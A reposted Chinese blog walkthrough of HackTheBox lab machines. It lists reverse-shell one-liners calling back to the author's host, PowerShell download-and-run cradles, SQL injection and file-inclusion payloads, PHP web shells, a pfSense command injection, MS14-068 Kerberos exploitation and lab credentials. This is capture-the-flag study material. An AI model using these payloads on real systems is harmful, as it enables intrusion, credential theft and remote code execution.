博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
hackthebox通关手记(持续更新)
阅读量:7007 次
发布时间:2019-06-27

本文共 4889 字,大约阅读时间需要 16 分钟。

简介:

花了点时间弄了几道题目。以前我是用windows渗透居多,在kali linux下渗透测试一直不怎么习惯。通过这几天做这些题目感觉顺手多了。有些题目脑洞也比较大,感觉很多也不适合于实际的环境

 

10.10.10.5

这题比较简单,ftp可以匿名登录并且可以put文件:anonymous,上传一句话或者是大马即可

期间有一个问题就是:大马下的shell不能type root.txt
我只好上传nc反弹才成功,反弹常用端口53,443。
C:\inetpub\wwwroot\nc.exe -e cmd.exe 10.10.xx.xx 443
Nc -lvvp 443

 

10.10.10.6

上传torrent,编辑图片上传test.php.png 利用菜刀上传到/tmp

Python back.py 10.10.14.22 1234
Nc -lvvp 1234
上传exp执行成功 cat root

10.10.10.7

elastaix 2.2本地文件包含漏洞
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf% 00&module=Accounts&action
hydra 破解收集到的用户密码

10.10.10.8
HFS远程代码执行漏洞

tcpdump -I tun0

远程执行ps1脚本
powershell -nop -c IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.22:8000/’)

Sublime Invoke-PowerShellTcp.ps1

/?search==%00{.exec|c:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Invoke-PowerShellTcp.ps1').}

nc -lvvp 1337

发现 存在的漏洞:
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Sherlock.ps1')
执行ms16032并加载shelltcp.ps1
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Invoke-MS16032.ps1')

nc -lvvp 1338

10.10.10.9

Drupal(水滴)cms漏洞利用远程代码执行

Apt-get install php7.2-curl  需要装2018.2的kali,不然就是需要升级。我发现php7木有合适的php-curl模块

Php exploit.php。需要把php自己修改一下。 修改成一句话木马即可,毕竟国人我还是适应用菜刀。sad

update-alternatives --config java     更换一下java就可以使用knife了

 

10.10.10.10

这个漏洞挺有意思的。
Wpscan 枚举到用户名takis

steghide extract -sf HackerAccessGranted.jpg 会导出id_rsa

ssh2john id_rsa > id_john

john id_john --wordlist=password.txt

ssh I id_rsa takis@10.10.10.10

superpassword
sudo /bin/fuckin bash

10.10.10.16

octobercms 扫目录backend 用户名密码:admin:admin 上传php5

迎合国际风格,实验环境直接用<?php echo system($_REQUEST['cmd']);?>

 

10.10.10.22

需要设置hosts

vi /etc/hosts

10.10.10.24

这题何有意思
curl直接下载

python -m SimpleHTTPServer

http://10.10.10.24/uploads/sec.php?sec=nc -e /bin/sh 10.10.14.22 8088

python3 -c 'import pty; pty.spawn("/bin/bash")'

 

10.10.10.31

在忘记密码处可以注入

a@b.c' uniOn select 1,2,3,concat(__username_,"@example.com") FROM supercms.operators limit 1,1 -- -

a@b.c' uniOn select 1,2,3,concat(__password_,"@example.com") FROM supercms.operators limit 1,1 -- -
super_cms_adm
tamarro

反弹shell,其实不反弹也可以

sec=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1234 >/tmp/f=

Pip install gmpy2 出错

apt-cache search libmpfr
find /usr -type f -name "libmpfr.s*"

ln -sf /usr/lib/x86_64-linux-gnu/libmpfr.so.6.0.1 /usr/lib/libmpfr.so.4

解决在此:https://blog.csdn.net/wanzt123/article/details/71036184?locationNum=8&fps=1

python RsaCtfTool.py --publickey /root/Desktop/crypt/decoder.pub --uncipherfile /root/Desktop/crypt/pass.crypt

nevermindthebollocks

supershell ‘/bin/ls$(cat /root/root.txt)’

10.10.10.37

在plugins目录下面有个jar,可以利用jd-gui反编译出MySQL的用户名和密码。

public String sqlHost = "localhost";
public String sqlUser = "root";
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";

phpmyadmin 一般有两种知道web路径导出shell、通过日志拿shell或者破解密码进入wp在后台getshell

利用密码猜解notch用户密码都是MySQL的密码

 

10.10.10.47

Donkey:d0nk3y1337!

import seccure
second = "\x01\xd3\xe1\xf2\x17T \xd0\x8a\xd6\xe2\xbd\x9e\x9e~P(\xf7\xe9\xa5\xc1KT\x9aI\xdd\\!\x95t\xe1\xd6p\xaa\"u2\xc2\x85F\x1e\xbc\x00\xb9\x17\x97\xb8\x0b\xc5y\xec<K-gp9\xa0\xcb\xac\x9et\x89z\x13\x15\x94Dn\xeb\x95\x19[\x80\xf1\xa8,\x82G`\xee\xe8C\xc1\x15\xa1~T\x07\xcc{\xbd\xda\xf0\x9e\x1bh\'QU\xe7\x163\xd4F\xcc\xc5\x99w"
print seccure.decrypt(second, "PrinceCharming")
Sec shr3k1sb3st!

touch — — reference=thoughts.txt

10.10.10.48

比较有意思,树莓派系统pi-hole 系统是Raspbian,有个默认账户密码:pi:raspberry用ssh登陆cat user.txt

Sudo -i 可以切换到root权限cat root.txt

I lost my original root.txt! I think I may have a backup on my USB stick...

Sudo strings /dev/sdb即可

 

10.10.10.52

Sa m$$ql_S@_P@ssW0rd!

james@htb.local james J@m3s_P@ssW0rd!
git clone impacket

apt-get install krb5-user cifs-utils rdate

sublime /etc/hosts
10.10.10.52 mantis.htb.local mantis

sublime /etc/krb5.conf

[libdefaults]

default_realm = HTB.LOCAL

[realms]

HTB.LOCAL = {
kdc = mantis.htb.local:88
admin_server = mantis.htb.local
default_domain = HTB.LOCAL
}
[domain_realm]
.domain.internal = HTB.LOCAL
domain.internal = HTB.LOCAL

rdate -n 10.10.10.52

kinit james

rpcclient -U james 10.10.10.52

lookupnames james

S-1-5-21-4220043660-4019079961-2895681657-1103

python ms14-068.py -u james@HTB.LOCAL -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis

cp TGT_james@HTB.LOCAL.ccache /tmp/krb5cc_0

J@m3s_P@ssW0rd!

cd impacket

python setup.py install

python goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 HTB.LOCAL/james@mantis.htb.local

10.10.10.60

/status_rrd_graph_img.php?database=queues;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;echo+"<%3fphp+%40eval(base64_decode('ZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsg'))%3b%3f>">wup.php

Wup.php?cmd=cat /root/root.txt

 

 

10.10.10.65

sslyze --regular 10.10.10.65

Imagetrick

10.10.10.63

Jenkins为授权访问

http://10.10.10.63:50000/askjeeves/script

 

转载于:https://www.cnblogs.com/whoami101/p/9298099.html

你可能感兴趣的文章
nginx报Could not build the server_names_hash,server_names_hash_bucket_size:32错
查看>>
linux中的计划任务
查看>>
码云全面改版:新界面新态度,匠心凝聚!
查看>>
【码云周刊第 28 期】计算机视觉时代的识图技术
查看>>
如何在IIS7或IIS7.5中导入导出站点及应用程序池.
查看>>
http的缓存机制
查看>>
linux安装mysql二进制包( 完整流程 )
查看>>
百度富文本编辑器插入html代码
查看>>
Jquery文本框变色
查看>>
再学 GDI+[26]: TGPPen - 画笔对齐 - SetAlignment
查看>>
10.位图索引
查看>>
图解 CSS (4): background - 背景
查看>>
网络数据包收发流程(三):e1000网卡和DMA
查看>>
MySQL主从同步问题集
查看>>
[置顶] cocos2d-x2.2.5走四棋儿源码“开源”
查看>>
在游戏框架中实现天空体
查看>>
在eclipse远程运行map/reduce例子
查看>>
png图片IE6下实现透明
查看>>
通过SSH远程连接Cisco设备
查看>>
Lisp在科学工作中的运用-1.1 定义各种类
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2025-02-05 21:55:35   当前IP: 18.223.106.195   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我